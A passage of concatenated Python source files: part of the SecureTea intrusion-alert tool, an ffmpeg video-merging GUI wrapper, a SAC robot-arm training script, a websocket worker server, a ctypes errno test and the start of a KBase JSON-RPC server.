self.ids_provided = False
# Check for Social Engineering
if self.social_eng_provided:
self.logger.log(
"Starting SecureTea Social Engineering",
logtype="info"
)
self.social_eng_obj = SecureTeaSocialEngineering(debug=self.cred["debug"], email_id=self.cred["social_eng"]["email"])
self.social_eng_obj.start()
# Check for History Logger
if self.history_logger:
self.logger.log(
"Starting SecureTea History Logger",
logtype="info"
)
self.history_logger_obj = SecureTeaHistoryLogger(debug=self.cred["debug"])
self.history_logger_obj.start()
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
# Avoid multiple process of the objects created by the IoT mode, set their credentials to False
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Welcome to SecureTea..!! Initializing System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.whatsapp_provided:
self.whatsapp = secureTeaWhatsapp.SecureTeaWhatsapp(
self.cred['whatsapp'],
self.cred['debug']
)
if not self.whatsapp.enabled:
self.logger.log(
"Whatsapp not configured properly.",
logtype="error"
)
else:
self.whatsapp.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.waf_provided:
try:
if self.cred['waf']:
waf_obj=SecureTeaWaf.SecureTeaWaf(cred=self.cred['waf'],debug=self.cred["debug"])
waf_obj.startWaf()
except KeyError:
self.logger.log(
"WAF parameter not configured ",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided or self.cred['clamav'] or self.cred['yara']:
if self.cred.get('antivirus',0):
antivirus = self.cred['antivirus']
else:
antivirus = {}
antivirus['update'] = False
antivirus['custom-scan'] = False
antivirus['auto-delete'] = False
antivirus['monitor-usb'] = False
antivirus['monitor-file-changes'] = False
antivirus['virustotal-api-key'] = ''
try:
antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus, use_clamav=self.cred['clamav'], use_yara=self.cred['yara'])
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via whatsapp account
if self.whatsapp_provided:
self.whatsapp.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
while(1):
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting mouse event listner
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
|
merger.py
|
# -*- coding: utf-8 -*-
import threading, io, os, time
import gui
import CommonVar as cv
import subprocess
import re
import wx
from gui.frame_merger import MergerOutputAppendEvent, MergerOutputUpdateEvent
SHUTDOWN = False
class CustomMethod:
def __init__(self, method, format_set):
self.method = method
self.format_set = format_set
def getCMDLine(self):
return self.method.format(**self.format_set)
class Ffmpeg(threading.Thread):
def __init__(self, dst, src, method):
threading.Thread.__init__(self)
self.dst = dst
self.src = src
self.method = method
self._stdout_buff = []
self._stderr_buff = []
self.stdout = None
self.stderr = None
self.proc = None
def run(self):
method_map = {
cv.MER_VIDEO_AUDIO: self.MergeVideoAudio,
cv.MER_CONCAT_PROTOCAL: self.ConcatProtocal,
cv.MER_CONCAT_DEMUXER: self.ConcatDemuxer
}
method_map[self.method]()
def customMethod(self):
cmdline = self.method.getCMDLine()
self.pipe_open(cmdline)
# def convert_mp4(self):
# cmdline = '"{ffmpeg_path}" -i "{src}" -i "{audio}" -vcodec copy -acodec copy "{output}"'
# cmdline = '"ffmpeg.exe" -i "out.mp4" -c:v libx264 "out1.mp4"'
# self.pipe_open(cmdline)
def handle_output(self, _buff, _thread):
rex_prog = re.compile(
'frame=\s*\s*(.*?)\s*\s*'
'fps=\s*\s*(.*?)\s*\s*'
'q=\s*\s*(.*?)\s*'
'size=\s*(.*?)\s*'
'time=\s*(.*?)\s*'
'bitrate=\s*(.*?)\s*'
'speed=\s*(.*)')
rex_done = re.compile(
'video:\s*\s*(.*?)\s*\s*'
'audio:\s*\s*(.*?)\s*\s*'
'subtitle:\s*\s*(.*?)\s*'
'other streams:\s*(.*?)\s*'
'global headers:\s*(.*?)\s*'
'muxing overhead:\s*(.*)')
total_len = cv.SEL_RES.getVideoTimeLength()
start_time = time.time()
# last_len = 0
next_cur = 0
non_monotonous_counter = 0
while True:
if cv.SHUTDOWN:
break
if len(_buff) > next_cur:
text_line = _buff[next_cur]
if 'Non-monotonous DTS in output stream' in text_line:
non_monotonous_counter += 1
if non_monotonous_counter <= 1:
wx.PostEvent(gui.frame_merger.textctrl_output, MergerOutputAppendEvent(text_line))
else:
if non_monotonous_counter > 1:
msg = '*** 以上忽略(%d)条连续Non-monotonous信息, 视频可能存在不完整错误! ***\n' % (non_monotonous_counter - 1)
wx.PostEvent(gui.frame_merger.textctrl_output, MergerOutputAppendEvent(msg))
non_monotonous_counter = 0
wx.PostEvent(gui.frame_merger.textctrl_output, MergerOutputAppendEvent(text_line))
time.sleep(0.01)
res = rex_prog.search(text_line)
if res:
tm = time.strptime(res.group(5), '%H:%M:%S.%y')
cur_len = (tm.tm_hour * 60 * 60 + tm.tm_min * 60 + tm.tm_sec) * 1000 + int(str(tm.tm_year)[2:]) * 10
cur_byte_str = res.group(4)
remain = (total_len - cur_len) / (cur_len / (time.time() - start_time))
hour = int(remain / 60 / 60)
minute = int((remain % (60*60)) / 60)
second = int(remain % 60)
remain_time_str = '%02d:%02d:%02d' % (hour, minute, second)
wx.PostEvent(gui.frame_merger.gauge_progress,
MergerOutputUpdateEvent(cur_len=cur_len, total_len=total_len,
cur_byte_str=cur_byte_str, remain_time_str=remain_time_str))
else:
res = rex_done.search(text_line)
if res:
wx.PostEvent(gui.frame_merger.gauge_progress,
MergerOutputUpdateEvent(cur_len=total_len, total_len=total_len, cur_byte_str=str(
round(os.path.getsize(self.dst + cv.TARGET_FORMAT) / 1024)) + 'kb',
remain_time_str='00:00:00'))
next_cur += 1
else:
if not _thread.isAlive():
break
time.sleep(0.01)
pass
def pipe_open(self, cmdline):
self.proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True,
stderr=subprocess.PIPE)
self.proc.stdin.close()
self.stdout = io.TextIOWrapper(
self.proc.stdout,
encoding='utf-8'
)
self.stderr = io.TextIOWrapper(
self.proc.stderr,
encoding='utf-8'
)
self._stdout_buff = []
stdout_thr = threading.Thread(target=self._readerthread, args=(self.stdout, self._stdout_buff), daemon=True)
stdout_thr.start()
self._stderr_buff = []
stderr_thr = threading.Thread(target=self._readerthread, args=(self.stderr, self._stderr_buff), daemon=True)
stderr_thr.start()
self.handle_output(self._stderr_buff, stderr_thr)
def MergeVideoAudio(self):
cmdline = '"{ffmpeg_path}" -i "{video}" -i "{audio}" -vcodec copy -acodec copy "{output}{ext}"'
cmdline = cmdline.format(video=self.src[0], audio=self.src[1], output=self.dst, ffmpeg_path=cv.FFMPEG_PATH, ext=cv.TARGET_FORMAT)
self.pipe_open(cmdline)
def ConcatProtocal(self):
videos = '|'.join([i for i in self.src])
cmdline = '"{ffmpeg_path}" -i concat:"{videos}" -c copy "{output}{ext}"'
cmdline = cmdline.format(videos=videos, output=self.dst, ffmpeg_path=cv.FFMPEG_PATH, ext=cv.TARGET_FORMAT)
self.pipe_open(cmdline)
def ConcatDemuxer(self):
concat_files = ["file '%s'" % i for i in self.src]
concat_files_str = '\n'.join(concat_files)
with open('concat_demuxer.txt', 'w') as f:
f.write(concat_files_str)
cmdline = '"{ffmpeg_path}" -f concat -safe 0 -i concat_demuxer.txt -c copy "{output}{ext}"'
cmdline = cmdline.format(ffmpeg_path=cv.FFMPEG_PATH, output=self.dst, ext=cv.TARGET_FORMAT)
self.pipe_open(cmdline)
def getSource(self):
return self.src
def getDest(self):
return self.dst
def _readerthread(self, fh, buffer):
while True:
out = fh.readline()
if out == '':
break
buffer.append(out)
fh.close()
def shutdown(self):
cmdline = 'taskkill /pid {pid} -t -f'.format(pid=self.proc.pid)
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True,
stderr=subprocess.PIPE)
a = proc.communicate()
self.proc.kill()
self.proc.terminate()
MER_TASK = []
def make(dst, src, method):
global MER_TASK
task = Ffmpeg(dst, src, method)
MER_TASK.append(task)
return task
def shutdown():
global SHUTDOWN
SHUTDOWN = True
for i in MER_TASK:
i.shutdown()
join()
def isClosed():
global SHUTDOWN
return SHUTDOWN
def del_src_files():
for i in MER_TASK:
for j in i.getSource():
os.remove(os.path.join(cv.FILEPATH, j).lstrip('/').lstrip('\\'))
os.removedirs(os.path.join(cv.FILEPATH, cv.SEL_RES.getVideoLegalTitle()))
def join():
global MER_TASK
if MER_TASK:
for i in MER_TASK:
i.join()
|
SAC_run_v12.py
|
#!/usr/bin/env python3
import threading, queue
import time
import os
import shutil
import numpy as np
import math
import rospy
import tensorflow as tf
from sac_v19 import SAC
from env_v26 import Test
from manipulator_h_base_module_msgs.msg import P2PPose
from CheckCollision_v1 import CheckCollision
MAX_EPISODES = 100000
MAX_EP_STEPS = 600
MEMORY_CAPACITY = 10000
BATCH_SIZE = 512
SIDE = ['right_', 'left_']
SIDE_ = ['R', 'L']
GOAL_REWARD = 800
LOAD = False
SAVE = [False, False]
COUNTER = [1, 1]
TRAIN_CNT = [0, 0]
EP = [0, 0]
WORKS = 1
SUCCESS_ARRAY = np.zeros([2,500])
GOAL_RATE = [40, 40]
ACTION_FLAG = [False, False]
def worker(name, workers, agent):
global SUCCESS_ARRAY, ACTION_FLAG, SAVE, COUNTER, EP
SUCCESS_RATE = 0
COLLISION = False
env = Test(name, workers) #0 = right
time.sleep(0.5)
print(threading.current_thread())
print('name', name, 'workers', workers, 'agentID', id(agent))
# if RUN_FLAG[workers].is_set():
# RUN_FLAG[workers].clear()
# else:
# RUN_FLAG[workers].set()
# RUN_FLAG[workers].wait()
t1 = time.time()
while (not COORD.should_stop()) and (not rospy.is_shutdown()):
# if RUN_FLAG[workers].is_set():
# RUN_FLAG[workers].clear()
# else:
# RUN_FLAG[workers].set()
# RUN_FLAG[workers].wait()
s_arr = []
a_arr = []
r_arr = []
s__arr = []
done_arr = []
img_arr = []
s = []
time.sleep(1)
s = env.reset()
ep_reward = 0
success_cnt = 0
done_cnt = 0
EP[name] += 1
ep = EP[name]
SUCCESS_ARRAY[name, ep%500] = 0.
# COLLISION = False
first_fail = True
for j in range(MAX_EP_STEPS):
WORKER_EVENT[name].wait()
# s = s.tolist()
a = agent.choose_action(s)
rd = np.random.rand()
a *= (rd*3+0.5)
s_, r, done, success, fail = env.step(a)
# , succcccccccccccccckkkkk
if j>10:
s_arr.append(s)
a_arr.append(a)
r_arr.append(r)
s__arr.append(s_)
# img_arr.append(succcccccccccccccckkkkk)
done_arr.append(done)
# agent.replay_buffer[workers].store_transition(s, a, r, s_, done)
# if fail:
# if first_fail:
# first_fail = False
# for k in range(50):
# if k>=len(r_arr):
# break
# r_arr[-k-1] -= (2-(k*0.04))
# else:
# r_arr[-1] -= 2
success_cnt += int(success)
done_cnt += int(done)
# if collision:
# COLLISION = True
s = s_
ep_reward += r
COUNTER[name]+=1
if COUNTER[name] >= BATCH_SIZE*32 and COUNTER[name]%(50) == 0:
WORKER_EVENT[name].clear()
for _ in range(2+int(ep/1000)):
agent.learn(TRAIN_CNT[name])
TRAIN_CNT[name]+=1
WORKER_EVENT[name].set()
# LEARN_EVENT[name].set()
if success_cnt > 0:
# if not COLLISION:
SUCCESS_ARRAY[name, ep%500] = 1.
break
if fail:
break
for i in range(len(s_arr)):
agent.replay_buffer[workers].store_transition(s_arr[i], a_arr[i], r_arr[i], s__arr[i], done_arr[i])
s_arr.clear()
a_arr.clear()
r_arr.clear()
s__arr.clear()
done_arr.clear()
SUCCESS_RATE = 0
for z in SUCCESS_ARRAY[name]:
SUCCESS_RATE += z/5
if SUCCESS_RATE >= GOAL_RATE[name]:
SAVE[name] = True
else:
SAVE[name] = False
agent.replay_buffer[workers].store_eprwd(ep_reward*j/100)
if workers == 0 and SAVE[name]:
SUCCESS_ARRAY[name] = np.zeros([500])
save(agent, name)
print('Running time: ', time.time() - t1)
if env.is_success:
print(SIDE_[name]+str(workers), ep, ' Reward: %i' % int(ep_reward), 'cnt: ',j, 's_rate: ', int(SUCCESS_RATE), 'sssuuucccccceeessssss ', env.success_cnt)
else:
print(SIDE_[name]+str(workers), ep, ' Reward: %i' % int(ep_reward), 'cnt: ',j, 's_rate: ', int(SUCCESS_RATE))
def save(agent, name):
print(agent.path)
if os.path.isdir(agent.path+str(GOAL_RATE[name])): shutil.rmtree(agent.path+str(GOAL_RATE[name]))
os.mkdir(agent.path+str(GOAL_RATE[name]))
ckpt_path = os.path.join(agent.path+str(GOAL_RATE[name]), 'SAC.ckpt')
save_path = agent.saver.save(agent.sess, ckpt_path, write_meta_graph=False)
print("\nSave Model %s\n" % save_path)
if GOAL_RATE[name] < 90:
GOAL_RATE[name] += 10
else:
GOAL_RATE[name] += 2
if GOAL_RATE[name] > 100:
COORD.request_stop()
def train(name):
global SAVE, COUNTER, RUN_FLAG
threads_ = []
print(threading.current_thread())
env = Test(name, 0)
agent = SAC(act_dim=env.act_dim, obs_dim=env.obs_dim, depth_dim=env.depth_dim,
lr_actor=2e-4, lr_value=2e-4 , gamma=0.99, tau=0.995, buffers = WORKS, name=SIDE[name], seed=name)
# lr_actor=1e-3, lr_value=1e-3
env = None
print('name', name, 'agentID', id(agent))
for j in range(WORKS):
t = threading.Thread(target=worker, args=(name, j, agent,))
threads_.append(t)
if name == 0:
RUN_FLAG.append(threading.Event())
RUN_FLAG[j].set()
time.sleep(1)
for i in threads_:
i.start()
if __name__ == '__main__':
rospy.init_node('a')
threads = []
RUN_FLAG = []
LEARN_EVENT = [threading.Event(), threading.Event()]
WORKER_EVENT = [threading.Event(), threading.Event()]
COORD = tf.train.Coordinator()
for i in range(1):
t = threading.Thread(target=train, args=(i,))
threads.append(t)
WORKER_EVENT[i].set()
LEARN_EVENT[i].clear()
for i in threads:
i.start()
time.sleep(10)
print(threading.current_thread())
COORD.join(threads)
|
ws.py
|
# -*- coding: utf-8 -*-
"""This code is not a bit production-ready, just a pimped imitation of uWSGI server behavior
"""
import logging
import time
from multiprocessing import Process
from wsgiref.simple_server import make_server
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import WSGIServer, WebSocketWSGIRequestHandler
from ws4py.server.wsgiutils import WebSocketWSGIApplication
log = logging.getLogger('symmrpc')
connected = False
class DummyWebSocketWSGIRequestHandler(WebSocketWSGIRequestHandler):
def handle(self):
global connected
if not connected:
connected = True
WebSocketWSGIRequestHandler.handle(self)
else:
log.debug('busy by other client')
init_worker = None
class MyWebSocket(WebSocket):
def opened(self):
global init_worker
log.debug('Socket opened')
self.recv_data = init_worker(lambda x: self.send(x, binary=True))
def received_message(self, message):
# log.debug('Server websocket received')
# TODO: check message.is_binary
self.recv_data(message.data)
def closed(self, code, reason):
log.debug('Socket closed %s %s', code, reason)
def start_worker(server, worker_num, init_woker_proc):
global init_worker
init_worker = init_woker_proc
log.debug('starting worker %d', worker_num)
try:
server.initialize_websockets_manager()
server.serve_forever()
except KeyboardInterrupt:
pass
log.debug('shut down worker %d', worker_num)
def master(count, host, port, init_worker_proc):
worker_server = make_server(host, port, server_class=WSGIServer,
handler_class=DummyWebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=MyWebSocket))
workers = [None] * count
for i in range(count):
workers[i] = Process(target=start_worker, args=(worker_server, i + 1, init_worker_proc))
workers[i].start()
while True:
time.sleep(1)
for i in range(count):
if not workers[i].is_alive():
log.debug('worker %d is dead', (i + 1))
workers[i] = Process(target=start_worker, args=(worker_server, i + 1, init_worker_proc))
workers[i].start()
def run_workers(host, port, count, init_worker_proc):
process = Process(target=master, args=(count, host, port, init_worker_proc))
process.start()
return process
|
test_errno.py
|
import unittest, os, errno
from ctypes import *
from ctypes.util import find_library
import threading
class Test(unittest.TestCase):
def test_open(self):
libc_name = find_library("c")
if libc_name is not None:
libc = CDLL(libc_name, use_errno=True)
if os.name == "nt":
libc_open = libc._open
else:
libc_open = libc.open
libc_open.argtypes = c_char_p, c_int
self.failUnlessEqual(libc_open("", 0), -1)
self.failUnlessEqual(get_errno(), errno.ENOENT)
self.failUnlessEqual(set_errno(32), errno.ENOENT)
self.failUnlessEqual(get_errno(), 32)
def _worker():
set_errno(0)
libc = CDLL(libc_name, use_errno=False)
if os.name == "nt":
libc_open = libc._open
else:
libc_open = libc.open
libc_open.argtypes = c_char_p, c_int
self.failUnlessEqual(libc_open("", 0), -1)
self.failUnlessEqual(get_errno(), 0)
t = threading.Thread(target=_worker)
t.start()
t.join()
self.failUnlessEqual(get_errno(), 32)
set_errno(0)
if os.name == "nt":
def test_GetLastError(self):
dll = WinDLL("kernel32", use_last_error=True)
GetModuleHandle = dll.GetModuleHandleA
GetModuleHandle.argtypes = [c_wchar_p]
self.failUnlessEqual(0, GetModuleHandle("foo"))
self.failUnlessEqual(get_last_error(), 126)
self.failUnlessEqual(set_last_error(32), 126)
self.failUnlessEqual(get_last_error(), 32)
def _worker():
set_last_error(0)
dll = WinDLL("kernel32", use_last_error=False)
GetModuleHandle = dll.GetModuleHandleW
GetModuleHandle.argtypes = [c_wchar_p]
GetModuleHandle("bar")
self.failUnlessEqual(get_last_error(), 0)
t = threading.Thread(target=_worker)
t.start()
t.join()
self.failUnlessEqual(get_last_error(), 32)
set_last_error(0)
if __name__ == "__main__":
unittest.main()
|
kb_MiniASMServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_MiniASM.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_MiniASM'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_MiniASM.kb_MiniASMImpl import kb_MiniASM # noqa @IgnorePep8
impl_kb_MiniASM = kb_MiniASM(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
